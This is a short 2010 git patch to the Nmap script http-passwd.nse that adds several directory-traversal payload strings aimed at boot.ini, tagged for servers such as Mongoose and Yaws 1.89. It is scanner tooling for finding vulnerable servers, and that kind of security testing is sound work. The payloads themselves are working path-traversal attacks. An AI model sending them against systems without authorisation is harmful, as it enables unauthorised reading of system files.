From fb0aa3f1e3f700980220d39900cc8858fe3f4aa2 Mon Sep 17 00:00:00 2001
From: david <david@e0a8ed71-7df4-0310-8962-fdc924857419>
Date: Thu, 11 Nov 2010 19:02:17 +0000
Subject: [PATCH] Add more http-passwd payloads from Ange Gutek.

---
 scripts/http-passwd.nse | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/scripts/http-passwd.nse b/scripts/http-passwd.nse
index 7e3f37bdb..6884b2fe7 100644
--- a/scripts/http-passwd.nse
+++ b/scripts/http-passwd.nse
@@ -144,6 +144,12 @@ action = function(host, port)
 		--Mongoose Web Server
 		'///..%2f..%2f..%2f..%2fboot.ini',
 		'/..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini',
+		'/%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\boot.ini',
+		-- Yaws 1.89
+		'/..\\/..\\/..\\/boot.ini',
+		'/..\\/\\..\\/\\..\\/\\boot.ini',
+		'/\\../\\../\\../boot.ini',
+		'////..\\..\\..\\boot.ini',
 		--MultiThreaded HTTP Server v1.1
 		'/..\\..\\..\\..\\\\..\\..\\\\..\\..\\\\\\boot.ini',
 		--uHttp Server